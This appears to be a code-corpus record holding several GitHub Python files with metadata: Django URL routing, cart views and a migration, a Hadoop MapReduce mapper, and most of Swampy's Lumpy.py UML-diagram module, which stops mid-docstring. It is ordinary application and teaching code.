| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('<str:user_id>', views.get_user, name='get_index')
]
|
[
"alexandre.megel@epitech.eu"
] |
alexandre.megel@epitech.eu
|
2ed362409143988f8e51e25c2879fbeca2e5301f
|
9724e9d7a03a1fbf39eeb4010b1083d25922e087
|
/introduction-to-hadoop-and-mapreduce/project_discussion_forum_data/post_and_answer_length/mapper.py
|
c98444a3a24c0a7fcf7b740ccec1c205ab0df1f8
|
[] |
no_license
|
rzskhr/Hadoop-and-MapReduce
|
d083061ae7ec607f5b7bdf46d170d90a46ec22a3
|
ca126ff05c78c42b699fd0b6cf7c3c0fc4c03313
|
refs/heads/master
| 2021-05-01T07:15:01.456532
| 2018-03-18T01:47:43
| 2018-03-18T01:47:43
| 121,152,389
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/python
import sys
import csv
reader = csv.reader(sys.stdin, delimiter='\t')
reader.next()
for data in reader:
if len(data) == 19:
id, title, tagnames, author_id, body, node_type, parent_id, abs_parent_id, added_at, score, state_string,\
last_edited_id, last_activity_by_id, last_activity_at, active_revision_id, \
extra, extra_ref_id, extra_count, marked = data
if node_type == "answer":
identifier = abs_parent_id
elif node_type == "question":
            identifier = id
print "{0}\t{1}\t{2}".format(identifier, node_type, len(body))
|
[
"rzskhr@outlook.com"
] |
rzskhr@outlook.com
|
00f8c9438b9ec2ded08e135db341637e568f1e40
|
d6934bd6680e704aac70660b5abb047b82b81cd3
|
/cart/views.py
|
97c18ab5d2708a547b3b8ef61fafe4fa28feffe9
|
[] |
no_license
|
mockystr/django_shop
|
b20239c753b67980b05d7311e5b28cb50b433250
|
85c805860c380c21ea6e9b30950dac09ec5d45d3
|
refs/heads/master
| 2020-03-27T21:11:14.083013
| 2018-09-11T16:08:59
| 2018-09-11T16:08:59
| 147,122,372
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,576
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.http import require_POST
from shop.models import Product
from .cart import Cart
from .forms import CartAddProductForm
from coupons.forms import CouponApplyForm
from shop.recommender import Recommender
@require_POST
def cart_add(request, product_id):
cart = Cart(request)
product = get_object_or_404(Product, id=product_id)
form = CartAddProductForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
cart.add(product=product, quantity=cd['quantity'], update_quantity=cd['update'])
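        # Presumably (judging by the 'update' flag on CartAddProductForm),
        # update_quantity=True makes Cart.add overwrite the stored quantity
        # instead of incrementing it.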
return redirect('cart:cart_detail')
def cart_remove(request, product_id):
cart = Cart(request)
product = get_object_or_404(Product, id=product_id)
cart.remove(product)
return redirect('cart:cart_detail')
def cart_detail(request):
cart = Cart(request)
for item in cart:
item['update_quantity_form'] = CartAddProductForm(initial={'quantity': item['quantity'], 'update': True})
coupon_apply_form = CouponApplyForm()
# r = Recommender()
# cart_products = [item['product'] for item in cart]
# recommended_products = r.suggest_products_for(cart_products, max_results=4)
return render(request, 'cart/detail.html', {'cart': cart,
'coupon_apply_form': coupon_apply_form,
# 'recommended_products': recommended_products
})
|
[
"navruzov.e@mail.ru"
] |
navruzov.e@mail.ru
|
0c1e6d12cfdc587b71555a705a5987682eeec445
|
c059eb73ca9687bcfb469e6de5b1cd45574ab5c4
|
/django/mysite/pybo/migrations/0003_answer_author.py
|
9902c64bc56ffa2874e5e45b7488d0e0e533bee7
|
[] |
no_license
|
DongwookKim0823/Jump_To_Django
|
01a5367b94874130bb44eebbc5917d32663c3a2b
|
99b2e50cb2ce50fc02e5eea7297eba9b67683fa6
|
refs/heads/main
| 2023-07-03T00:28:03.528556
| 2021-08-05T14:59:04
| 2021-08-05T14:59:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
# Generated by Django 3.2.4 on 2021-07-13 08:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pybo', '0002_question_author'),
]
operations = [
migrations.AddField(
model_name='answer',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='auth.user'),
preserve_default=False,
),
]
|
[
"dwkim0823@naver.com"
] |
dwkim0823@naver.com
|
499b84e469bde9702e0fa190e50d9de456e494ed
|
fc52aef588754c41db17a1d28252b1899c2a8cba
|
/swampy/Lumpy.py
|
9eaf153cdd7a2b087e758150c0f4213d5d1b9776
|
[] |
no_license
|
hypan599/think_complexity
|
884e5fcaeeaf66450da6ce28439bfe2b49a14439
|
26b4542c7362e8aa8731a6794228595c01605697
|
refs/heads/master
| 2021-09-08T10:55:26.755023
| 2018-03-09T10:39:57
| 2018-03-09T10:39:57
| 112,902,374
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 48,358
|
py
|
#!/usr/bin/python
"""This module is part of Swampy, a suite of programs available from
allendowney.com/swampy.
Copyright 2010 Allen B. Downey
Distributed under the GNU General Public License at gnu.org/licenses/gpl.html.
UML diagrams for Python
Lumpy generates UML diagrams (currently object and class diagrams)
from a running Python program. It is similar to a graphical debugger
in the sense that it generates a visualization of the state of a
running program, but it is different from a debugger in the sense that
it tries to generate high-level visualizations that are compliant (at
least in spirit) with standard UML.
There are three target audiences for this module: teachers, students
and software engineers. Teachers can use Lumpy to generate figures
that demonstrate a model of the execution of a Python
program. Students can use Lumpy to explore the behavior of the Python
interpreter. Software engineers can use Lumpy to extract the structure
of existing programs by diagramming the relationships among the
classes, including classes defined in libraries and the Python
interpreter.
"""
import inspect
import sys
import tkinter
from tkinter import N, S, E, W, SW, HORIZONTAL, ALL, LAST
from Gui import Gui, GuiCanvas, Point, BBox, underride, ScaleTransform
# get the version of Python
VERSION = sys.version.split()[0].split('.')
MAJOR = int(VERSION[0])
if MAJOR < 2:
print('You must have at least Python version 2.0 to run Lumpy.')
sys.exit()
MINOR = int(VERSION[1])
if MAJOR == 2 and MINOR < 4:
# author_TODO: provide a substitute implementation of set
pass
if MAJOR == 2:
    import Tkinter
    TKINTER_MODULE = Tkinter
else:
    TKINTER_MODULE = tkinter
# most text uses the font specified below; some labels
# in object diagrams use smallfont. Lumpy uses the size
# of the fonts to define a length unit, so
# changing the font sizes will cause the whole diagram to
# scale up or down.
FONT = ("Helvetica", 10)
SMALLFONT = ("Helvetica", 9)
class DiagCanvas(GuiCanvas):
"""Canvas for displaying Diagrams."""
def box(self, box, padx=0.4, pady=0.2, **options):
"""Draws a rectangle with the given bounding box.
Args:
box: BBox object or list of coordinate pairs.
padx, pady: padding
"""
        # underride sets default values only if the caller hasn't set them
underride(options, outline='black')
box.left -= padx
box.top -= pady
box.right += padx
box.bottom += pady
item = self.rectangle(box, **options)
return item
def arrow(self, start, end, **options):
"""Draws an arrow.
Args:
start: Point or coordinate pair.
end: Point or coordinate pair.
"""
return self.line([start, end], **options)
def offset_text(self, pos, text, dx=0, dy=0, **options):
"""Draws the given text at the given position.
Args:
pos: Point or coordinate pair
text: string
dx, dy: offset
"""
underride(options, fill='black', font=FONT, anchor=W)
x, y = pos
x += dx
y += dy
return self.text([x, y], text, **options)
def dot(self, pos, r=0.2, **options):
"""Draws a dot at the given position with radius r."""
underride(options, fill='white', outline='orange')
return self.circle(pos, r, **options)
def measure(self, t, **options):
"""Finds the bounding box of the list of words.
Draws the text, measures them, and then deletes them.
"""
pos = Point([0, 0])
tags = 'temp'
for s in t:
self.offset_text(pos, s, tags=tags, **options)
pos.y += 1
bbox = self.bbox(tags)
self.delete(tags)
return bbox
class MakeTag(object):
"""Encapsulates a unique Tag generator."""
nextid = 0
@classmethod
def make_tag(cls, prefix='Tag'):
"""Return a tuple with a single element: a tag string.
Uses the given prefix and a unique id as a suffix.
prefix: string
returns: string
"""
cls.nextid += 1
tag = '%s%d' % (prefix, cls.nextid)
return tag,
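# e.g. the first call to MakeTag.make_tag('Simple') returns the one-element
# tuple ('Simple1',), which callers concatenate directly onto other tag tuples.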
class Thing(object):
"""Parent class for objects that have a graphical representation.
Each Thing object corresponds to an item
or set of items in a diagram. A Thing can only be drawn in
one Diagram at a time.
"""
things_created = 0
things_drawn = 0
def __new__(cls, *args, **kwds):
"""Override __new__ so we can count the number of Things."""
Thing.things_created += 1
return object.__new__(cls)
def get_bbox(self):
"""Returns the bounding box of this object if it is drawn."""
return self.canvas.bbox(self.tags)
def set_offset(self, pos):
"""Sets the offset attribute.
The offset attribute keeps track of the offset between
the bounding box of the Thing and its nominal position, so
that if the Thing is moved later, we can compute its new
nominal position.
"""
self.offset = self.get_bbox().offset(pos)
def pos(self):
"""Computes the nominal position of a Thing.
Gets the current bounding box and adds the offset.
"""
return self.get_bbox().pos(self.offset)
def isdrawn(self):
"""Return True if the object has been drawn."""
return hasattr(self, 'drawn')
def draw(self, diag, pos, flip, tags=tuple()):
"""Draws this Thing at the given position.
Most child classes use this method as a template and
override drawme() to provide type-specific behavior.
draw() and drawme() are not allowed to modify pos.
Args:
diag: which diagram to draw on
pos: Point or coordinate pair
flip: int (1 means draw left to right; flip=-1 means right to left)
tags: additional tags to apply
Returns:
list of Thing objects
"""
if self.isdrawn():
return []
self.drawn = True
self.diag = diag
self.canvas = diag.canvas
# keep track of how many things have been drawn.
# Simple values can get drawn more than once, so the
# total number of things drawn can be greater than
# the number of things.
Thing.things_drawn += 1
if Thing.things_drawn % 100 == 0:
print(Thing.things_drawn)
# uncomment this to see things as they are drawn
#self.diag.lumpy.update()
# each thing has a list of tags: its own tag plus
# the tag of each thing it belongs to. This convention
# makes it possible to move entire structures with one
# move command.
self.tags = MakeTag.make_tag(self.__class__.__name__)
tags += self.tags
# invoke drawme in the child class
drawn = self.drawme(diag, pos, flip, tags)
if drawn == None:
drawn = [self]
self.set_offset(pos)
return drawn
def drawme(self, diag, pos, flip, tags):
raise ValueError('Unimplemented method.')
def bind(self, tags=None):
"""Create bindings for the items with the given tags."""
tags = tags or self.tags
items = self.canvas.find_withtag(tags)
for item in items:
self.canvas.tag_bind(item, "<Button-1>", self.down)
def down(self, event):
"""Save state for the beginning of a drag and drop.
Callback invoked when the user clicks on an item.
"""
self.dragx = event.x
self.dragy = event.y
self.canvas.bind("<B1-Motion>", self.motion)
self.canvas.bind("<ButtonRelease-1>", self.up)
return True
def motion(self, event):
"""Move the Thing during a drag.
Callback invoked when the user drags an item"""
dx = event.x - self.dragx
dy = event.y - self.dragy
self.dragx = event.x
self.dragy = event.y
self.canvas.move(self.tags, dx, dy)
self.diag.update_arrows()
def up(self, event):
"""Release the object being dragged.
Callback invoked when the user releases the button.
"""
event.widget.unbind ("<B1-Motion>")
event.widget.unbind ("<ButtonRelease-1>")
self.diag.update_arrows()
class Dot(Thing):
"""Represents a dot in a diagram."""
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
self.canvas.dot(pos, tags=tags)
class Simple(Thing):
"""Represents a simple value like a number or a string."""
def __init__(self, lumpy, val):
lumpy.register(self, val)
self.val = val
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
p.x += 0.1 * flip
anchor = {1:W, -1:E}
# put quotes around strings; for everything else, use
# the standard str representation
val = self.val
maxlen = 30
if isinstance(val, str):
val = val.strip('\n')
label = "'%s'" % val[0:maxlen]
else:
label = str(val)
self.canvas.offset_text(p, label, tags=tags, anchor=anchor[flip])
self.bind()
class Index(Simple):
"""Represents an index in a Sequence.
An Index object does not register with lumpy, so that even
in pedantic mode, it is always drawn, and it is never the
target of a reference (since it is not really a value at
run-time).
"""
def __init__(self, _, val):
self.val = val
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
p.x += 0.1 * flip
anchor = {1:W, -1:E}
label = str(self.val)
self.canvas.offset_text(p, label, tags=tags, anchor=anchor[flip])
self.bind()
class Mapping(Thing):
"""Represents a mapping type (usually a dictionary).
Sequence and Instance inherit from Mapping.
"""
def __init__(self, lumpy, val):
lumpy.register(self, val)
self.bindings = make_kvps(lumpy, list(val.items()))
self.boxoptions = dict(outline='purple')
self.label = type(val).__name__
def get_bbox(self):
"""Gets the bounding box for this Mapping.
The bbox of a Mapping is the bbox of its box item.
This is different from other Things.
"""
return self.canvas.bbox(self.boxitem)
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
# intag is attached to items that should be considered
# inside the box
intag = self.tags[0] + 'inside'
# draw the bindings
for binding in self.bindings:
# check whether the key was already drawn
drawn = binding.key.isdrawn()
# draw the binding
binding.draw(diag, p, flip, tags=tags)
# apply intag to the dots
self.canvas.addtag_withtag(intag, binding.dot.tags)
if drawn:
# if the key was already drawn, then the binding
# contains two dots, so we should add intag to the
# second one.
if binding.dot2:
self.canvas.addtag_withtag(intag, binding.dot2.tags)
else:
# if the key wasn't drawn yet, it should be
# considered inside this mapping
self.canvas.addtag_withtag(intag, binding.key.tags)
# move down to the position for the next binding
p.y = binding.get_bbox().bottom + 1.8
if len(self.bindings):
# if there are any bindings, draw a box around them
bbox = self.canvas.bbox(intag)
item = self.canvas.box(bbox, tags=tags, **self.boxoptions)
else:
# otherwise just draw a box
bbox = BBox([p.copy(), p.copy()])
item = self.canvas.box(bbox, padx=0.4, pady=0.4, tags=tags,
**self.boxoptions)
# make the box clickable
self.bind(item)
self.boxitem = item
# put the label above the box
if self.label:
p = bbox.upperleft()
item = self.canvas.offset_text(p, self.label, anchor=SW,
font=SMALLFONT, tags=tags)
# make the label clickable
self.bind(item)
# if the whole mapping is not in the right position, shift it.
if flip == 1:
dx = pos.x - self.get_bbox().left
else:
dx = pos.x - self.get_bbox().right
self.canvas.move(self.tags, dx, 0, transform=True)
def scan_bindings(self, cls):
"""Looks for references to other types.
Invokes add_hasa on cls.
Args:
cls: is the Class of the object that contains this mapping.
"""
for binding in self.bindings:
for val in binding.vals:
self.scan_val(cls, val)
def scan_val(self, cls, val):
"""Looks for references to other types.
If we find a reference to an object type, make a note
of the HAS-A relationship. If we find a reference to a
container type, scan it for references.
Args:
cls: is the Class of the object that contains this mapping.
"""
if isinstance(val, Instance) and val.cls is not None:
cls.add_hasa(val.cls)
elif isinstance(val, Sequence):
val.scan_bindings(cls)
elif isinstance(val, Mapping):
val.scan_bindings(cls)
class Sequence(Mapping):
"""Represents a sequence type (mostly lists and tuples)."""
def __init__(self, lumpy, val):
lumpy.register(self, val)
self.bindings = make_bindings(lumpy, enumerate(val))
self.label = type(val).__name__
# color code lists, tuples, and other sequences
if isinstance(val, list):
self.boxoptions = dict(outline='green1')
elif isinstance(val, tuple):
self.boxoptions = dict(outline='green4')
else:
self.boxoptions = dict(outline='green2')
class Instance(Mapping):
"""Represents an object (usually).
Anything with a __dict__ is treated as an Instance.
"""
def __init__(self, lumpy, val):
lumpy.register(self, val)
# if this object has a class, make a Thing to
# represent the class, too
if hasclass(val):
class_or_type = val.__class__
self.cls = make_thing(lumpy, class_or_type)
else:
class_or_type = type(val)
self.cls = None
self.label = class_or_type.__name__
if class_or_type in lumpy.instance_vars:
# if the class is in the list, only display only the
# unrestricted instance variables
ks = lumpy.instance_vars[class_or_type]
it = [(k, getattr(val, k)) for k in ks]
seq = make_bindings(lumpy, it)
else:
# otherwise, display all of the instance variables
if hasdict(val):
it = list(val.__dict__.items())
elif hasslots(val):
it = [(k, getattr(val, k)) for k in val.__slots__]
else:
t = [k for k, v in type(val).__dict__.items()
if str(v).find('attribute') == 1]
it = [(k, getattr(val, k)) for k in t]
seq = make_bindings(lumpy, it)
# and if the object extends list, tuple or dict,
# append the items
if isinstance(val, (list, tuple)):
seq += make_bindings(lumpy, enumerate(val))
if isinstance(val, dict):
seq += make_bindings(lumpy, list(val.items()))
# if this instance has a name attribute, show it
attr = '__name__'
if hasname(val):
seq += make_bindings(lumpy, [[attr, val.__name__]])
self.bindings = seq
self.boxoptions = dict(outline='red')
def scan_bindings(self, cls):
"""Look for references to other types.
Invokes add_ivar and add_hasa on cls.
Records the names of the instance variables.
Args:
cls: is the Class of the object that contains this mapping.
"""
for binding in self.bindings:
cls.add_ivar(binding.key.val)
for val in binding.vals:
self.scan_val(cls, val)
class Frame(Mapping):
"""Represents a frame."""
def __init__(self, lumpy, frame):
it = list(frame.locals.items())
self.bindings = make_bindings(lumpy, it)
self.label = frame.func
self.boxoptions = dict(outline='blue')
class Class(Instance):
"""Represents a Class.
Inherits from Instance, which controls how a Class appears in an
object diagram, and contains a ClassDiagramClass, which
controls how the Class appears in a class diagram.
"""
def __init__(self, lumpy, classobj):
Instance.__init__(self, lumpy, classobj)
self.cdc = ClassDiagramClass(lumpy, classobj)
self.cdc.cls = self
lumpy.classes.append(self)
self.classobj = classobj
self.module = classobj.__module__
self.bases = classobj.__bases__
# childs is the list of classes that inherit directly
# from this one; parents is the list of base classes
# for this one
self.childs = []
# refers is a dictionary that records, for each other
# class, the total number of references we have found from
# this class to that
self.refers = {}
# make a list of Things to represent the
# parent classes
if lumpy.is_opaque(classobj):
self.parents = []
else:
self.parents = [make_thing(lumpy, base) for base in self.bases]
# add self to the parents' lists of children
for parent in self.parents:
parent.add_child(self)
# height and depth are used to lay out the tree
self.height = None
self.depth = None
def add_child(self, child):
"""Adds a child.
When a subclass is created, it notifies its parent
classes, who update their list of children."""
self.childs.append(child)
def add_hasa(self, child, n=1):
"""Increment the reference count from this class to a child."""
self.refers[child] = self.refers.get(child, 0) + n
def add_ivar(self, var):
"""Adds to the set of instance variables for this class."""
self.cdc.ivars.add(var)
def set_height(self):
"""Computes the maximum height between this class and a leaf class.
(A leaf class has no children)
Sets the height attribute.
"""
if self.height != None:
return
if not self.childs:
self.height = 0
return
for child in self.childs:
child.set_height()
heights = [child.height for child in self.childs]
self.height = max(heights) + 1
def set_depth(self):
"""Compute the maximum depth between this class and a root class.
(A root class has no parent)
Sets the depth attribute.
"""
if self.depth != None:
return
if not self.parents:
self.depth = 0
return
for parent in self.parents:
parent.set_depth()
depths = [parent.depth for parent in self.parents]
self.depth = max(depths) + 1
class ClassDiagramClass(Thing):
"""Represents a class as it appears in a class diagram."""
def __init__(self, lumpy, classobj):
self.lumpy = lumpy
self.classobj = classobj
# self.methods is the list of methods defined in this class.
# self.cvars is the list of class variables.
# self.ivars is a set of instance variables.
self.methods = []
self.cvars = []
self.ivars = set()
# if this is a restricted (or opaque) class, then
# vars contains the list of instance variables that
# will be shown; otherwise it is None.
try:
variables = lumpy.instance_vars[classobj]
except KeyError:
variables = None
# we can get methods and class variables now, but we
# have to wait until the Lumpy representation of the stack
# is complete before we can go looking for instance vars.
for key, val in list(classobj.__dict__.items()):
if variables is not None and key not in variables:
continue
if iscallable(val):
self.methods.append(val)
else:
self.cvars.append(key)
key = lambda x: x.__class__.__name__ + "." + x.__name__
self.methods.sort(key=key)
self.cvars.sort()
self.boxoptions = dict(outline='blue')
self.lineoptions = dict(fill='blue')
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
# draw the name of the class
name = self.classobj.__name__
item = self.canvas.offset_text(p, name, tags=tags)
p.y += 0.8
# in order to draw lines between segments, we have
# to store the locations and draw the lines, later,
# when we know the location of the box
lines = []
# draw a line between the name and the methods
if self.methods:
lines.append(p.y)
p.y += 1
# draw the methods
for f in self.methods:
item = self.canvas.offset_text(p, f.__name__, tags=tags)
p.y += 1
# draw the class variables
cvars = [var for var in self.cvars if not var.startswith('__')]
if cvars:
lines.append(p.y)
p.y += 1
for varname in cvars:
item = self.canvas.offset_text(p, varname, tags=tags)
p.y += 1
# if this is a restricted (or opaque) class, remove
# unwanted instance vars from self.ivars
try:
variables = self.lumpy.instance_vars[self.classobj]
self.ivars.intersection_update(variables)
except KeyError:
pass
# draw the instance variables
ivars = list(self.ivars)
ivars.sort()
if ivars:
lines.append(p.y)
p.y += 1
for varname in ivars:
item = self.canvas.offset_text(p, varname, tags=tags)
p.y += 1
# draw the box
bbox = self.get_bbox()
item = self.canvas.box(bbox, tags=tags, **self.boxoptions)
self.boxitem = item
# draw the lines
for y in lines:
coords = [[bbox.left, y], [bbox.right, y]]
item = self.canvas.line(coords, tags=tags, **self.lineoptions)
# only the things we have drawn so far should be bound
self.bind()
# make a list of all classes drawn
alldrawn = [self]
# draw the descendents of this class
childs = self.cls.childs
if childs:
q = pos.copy()
q.x = bbox.right + 8
drawn = self.diag.draw_classes(childs, q, tags)
alldrawn.extend(drawn)
self.head = self.arrow_head(diag, bbox, tags)
# connect this class to its children
for child in childs:
a = ParentArrow(self.lumpy, self, child.cdc)
self.diag.add_arrow(a)
# if the class is not in the right position, shift it.
dx = pos.x - self.get_bbox().left
self.canvas.move(self.tags, dx, 0)
return alldrawn
def arrow_head(self, diag, bbox, tags, size=0.5):
"""Draws the hollow arrow head.
Connects this class to classes that inherit from it.
"""
x, y = bbox.midright()
x += 0.1
coords = [[x, y], [x+size, y+size], [x+size, y-size], [x, y]]
item = self.canvas.line(coords, tags=tags, **self.lineoptions)
return item
class Binding(Thing):
"""Represents the binding between a key or variable and a value."""
def __init__(self, lumpy, key, val):
lumpy.register(self, (key, val))
self.key = key
self.vals = [val]
def rebind(self, val):
"""Add to the list of values.
I don't remember what this is for and it is not in current use.
"""
self.vals.append(val)
def draw_key(self, diag, pos, flip, tags):
"""Draws a reference to a previously-drawn key.
(Rather than drawing the key inside the mapping.)
"""
pos.x -= 0.5 * flip
self.dot2 = Dot()
self.dot2.draw(diag, pos, -flip, tags=tags)
# only the things we have drawn so far should
# be handles for this binding
self.bind()
if not self.key.isdrawn():
pos.x -= 2.0 * flip
self.key.draw(diag, pos, -flip, tags=tags)
a = ReferenceArrow(self.lumpy, self.dot2, self.key, fill='orange')
diag.add_arrow(a)
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
self.dot = Dot()
self.dot.draw(diag, pos, flip, tags=tags)
p = pos.copy()
p.x -= 0.5 * flip
# if the key is a Simple, try to draw it inside the mapping;
# otherwise, draw a reference to it
if isinstance(self.key, Simple):
drawn = self.key.draw(diag, p, -flip, tags=tags)
# if a Simple thing doesn't get drawn, we must be in
# pedantic mode.
if drawn:
self.bind()
self.dot2 = None
else:
self.draw_key(diag, p, flip, tags)
else:
self.draw_key(diag, p, flip, tags)
p = pos.copy()
p.x += 2.0 * flip
for val in self.vals:
val.draw(diag, p, flip, tags=tags)
a = ReferenceArrow(self.lumpy, self.dot, val, fill='orange')
diag.add_arrow(a)
p.y += 1
class Arrow(Thing):
"""Parent class for arrows."""
def update(self):
"""Redraws this arrow after something moves."""
if not hasdiag(self):
return
self.diag.canvas.delete(self.item)
self.draw(self.diag)
class ReferenceArrow(Arrow):
"""Represents a reference in an object diagram."""
def __init__(self, lumpy, key, val, **options):
self.lumpy = lumpy
self.key = key
self.val = val
self.options = options
def draw(self, diag):
"""Draw the Thing.
Overrides draw() rather than drawme() because arrows can't
be dragged and dropped.
"""
self.diag = diag
canvas = diag.canvas
self.item = canvas.arrow(self.key.pos(),
self.val.pos(),
**self.options)
self.item.lower()
def update(self):
"""Redraws this arrow after something moves."""
if not hasdiag(self):
return
self.item.coords([self.key.pos(), self.val.pos()])
class ParentArrow(Arrow):
"""Represents an inheritance arrow.
Shows an is-a relationship between classes in a class diagram.
"""
def __init__(self, lumpy, parent, child, **options):
self.lumpy = lumpy
self.parent = parent
self.child = child
underride(options, fill='blue')
self.options = options
def draw(self, diag):
"""Draw the Thing.
Overrides draw() rather than drawme() because arrows can't
be dragged and dropped.
"""
self.diag = diag
parent, child = self.parent, self.child
# the line connects the midleft point of the child
# to the arrowhead of the parent; it always contains
# two horizontal segments and one vertical.
canvas = diag.canvas
bbox = canvas.bbox(parent.head)
p = bbox.midright()
q = canvas.bbox(child.boxitem).midleft()
midx = (p.x + q.x) / 2.0
m1 = [midx, p.y]
m2 = [midx, q.y]
coords = [p, m1, m2, q]
self.item = canvas.line(coords, **self.options)
canvas.lower(self.item)
class ContainsArrow(Arrow):
"""Represents a contains arrow.
Shows a has-a relationship between classes in a class diagram.
"""
def __init__(self, lumpy, parent, child, **options):
self.lumpy = lumpy
self.parent = parent
self.child = child
underride(options, fill='orange', arrow=LAST)
self.options = options
def draw(self, diag):
"""Draw the Thing.
Overrides draw() rather than drawme() because arrows can't
be dragged and dropped.
"""
self.diag = diag
parent, child = self.parent, self.child
if not child.isdrawn():
self.item = None
return
canvas = diag.canvas
p = canvas.bbox(parent.boxitem).midleft()
q = canvas.bbox(child.boxitem).midright()
coords = [p, q]
self.item = canvas.line(coords, **self.options)
canvas.lower(self.item)
class Stack(Thing):
"""Represents the call stack."""
def __init__(self, lumpy, snapshot):
self.lumpy = lumpy
self.frames = [Frame(lumpy, frame) for frame in snapshot.frames]
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
for frame in self.frames:
frame.draw(diag, p, flip, tags=tags)
bbox = self.get_bbox()
#p.y = bbox.bottom + 3
p.x = bbox.right + 3
def make_bindings(lumpy, iterator):
"""Make bindings for each key-value pair in iterator.
The keys are made into Index objects.
"""
seq = [Binding(lumpy, Index(lumpy, k), make_thing(lumpy, v))
for k, v in iterator]
return seq
def make_kvps(lumpy, iterator):
"""Make bindings for each key-value pair in iterator.
The keys are made into Thing objects.
"""
seq = [Binding(lumpy, make_thing(lumpy, k), make_thing(lumpy, v))
for k, v in iterator]
return seq
def make_thing(lumpy, val):
"""Make a Thing to represents this value.
Either by making a new one or looking up an existing one.
"""
# if we're being pedantic, then we always show aliased
# values
if lumpy.pedantic:
thing = lumpy.lookup(val)
if thing != None:
return thing
# otherwise for simple immutable types, ignore aliasing and
# just draw
    simple = (str, bool, int, float, complex, type(None))
if isinstance(val, simple):
thing = Simple(lumpy, val)
return thing
# now check for aliasing even if we're not pedantic
thing = lumpy.lookup(val)
if thing != None:
return thing
# check the type of the value and dispatch accordingly
if type(val) == type(Lumpy) or type(val) == type(type(int)):
thing = Class(lumpy, val)
elif hasdict(val) or hasslots(val):
thing = Instance(lumpy, val)
elif isinstance(val, (list, tuple)):
thing = Sequence(lumpy, val)
elif isinstance(val, dict):
thing = Mapping(lumpy, val)
elif isinstance(val, object):
thing = Instance(lumpy, val)
else:
# print "Couldn't classify", val, type(val)
thing = Simple(lumpy, val)
return thing
# the following are short functions that check for certain attributes
def hasname(obj): return hasattr(obj, '__name__')
def hasclass(obj): return hasattr(obj, '__class__')
def hasdict(obj): return hasattr(obj, '__dict__')
def hasslots(obj): return hasattr(obj, '__slots__')
def hasdiag(obj): return hasattr(obj, 'diag')
def iscallable(obj): return hasattr(obj, '__call__')
class Snapframe(object):
"""A snapshot of a call frame."""
def __init__(self, tup):
frame, filename, lineno, self.func, lines, index = tup
(self.arg_names,
self.args,
self.kwds,
locs) = inspect.getargvalues(frame)
# make a copy of the dictionary of local vars
self.locals = dict(locs)
# the function name for the top-most frame is __main__
if self.func == '?':
self.func = '__main__'
def subtract(self, other):
"""Deletes the keys in other from self."""
for key in other.locals:
try:
del self.locals[key]
except KeyError:
print(key, "this shouldn't happen")
class Snapshot(object):
"""A snapshot of the call stack."""
def __init__(self):
"""Converts from the format returned by inspect to a list of frames.
Drop the last three frames,
which are the Lumpy functions object_diagram, make_stack,
and Stack.__init__
"""
st = inspect.stack()
frames = [Snapframe(tup) for tup in st[3:]]
frames.reverse()
self.frames = frames
def spew(self):
"""Prints the frames in this snapshot."""
for frame in self.frames:
print(frame.func, frame)
def clean(self, ref):
"""Remove all the variables in the reference stack from self.
NOTE: This currently only works on the top-most frame
"""
f1 = self.frames[0]
f2 = ref.frames[0]
f1.subtract(f2)
class Lumpy(Gui):
"""Container for the program state and its representations."""
def __init__(self, debug=False, pedantic=False):
"""Initializes Lumpy.
Args:
debug: boolean that makes the outlines of the frames visible.
pedantic: boolean whether to show aliasing for simple values.
If pedantic is false, simple values are replicated, rather
than, for example, having all references to 1 refer to the
same int object.
"""
Gui.__init__(self, debug)
self.pedantic = pedantic
self.withdraw()
# initially there is no object diagram, no class diagram
# and no representation of the stack.
self.od = None
self.cd = None
self.stack = None
# instance_vars maps from classes to the instance vars
# that are drawn for that class; for opaque classes, it
# is an empty list.
# an instance of an opaque class is shown with a small empty box;
# the contents are not shown.
self.instance_vars = {}
# the following classes are opaque by default
self.opaque_class(Lumpy)
self.opaque_class(object)
self.opaque_class(type(make_thing)) # function
self.opaque_class(Exception)
self.opaque_class(set) # I don't remember why
# any object that belongs to a class in the Tkinter module
# is opaque (the name of the module depends on the Python version)
self.opaque_module(TKINTER_MODULE)
# by default, class objects and module objects are opaque
classobjtype = type(Lumpy)
self.opaque_class(classobjtype)
modtype = type(inspect)
self.opaque_class(modtype)
# the __class__ of a new-style object is a type object.
# when type objects are drawn, show only the __name__
self.opaque_class(type)
self.make_reference()
def restrict_class(self, classobj, variables=None):
"""Restricts a class so that only the given variables are shown."""
if variables == None:
variables = []
self.instance_vars[classobj] = variables
def opaque_class(self, classobj):
"""Restricts a class so that no variables are shown."""
self.restrict_class(classobj, None)
def is_opaque(self, classobj):
"""Checks whether this class is completely opaque.
(restricted to _no_ instance variables)
"""
try:
return not len(self.instance_vars[classobj])
except KeyError:
return False
def transparent_class(self, classobj):
"""Unrestricts a class so its variables are shown.
If the class is not restricted, raise an exception."""
del self.instance_vars[classobj]
def opaque_module(self, modobj):
"""Makes all classes defined in this module opaque."""
for var, val in modobj.__dict__.items():
if isinstance(val, type(Lumpy)):
self.opaque_class(val)
def make_reference(self):
"""Takes a snapshot of the current state.
Subsequent diagrams will be relative to this reference.
"""
self._make_reference_helper()
def _make_reference_helper(self):
"""Takes the reference snapshot.
This extra method call is here so that the reference
and the snapshot we take later have the same number of
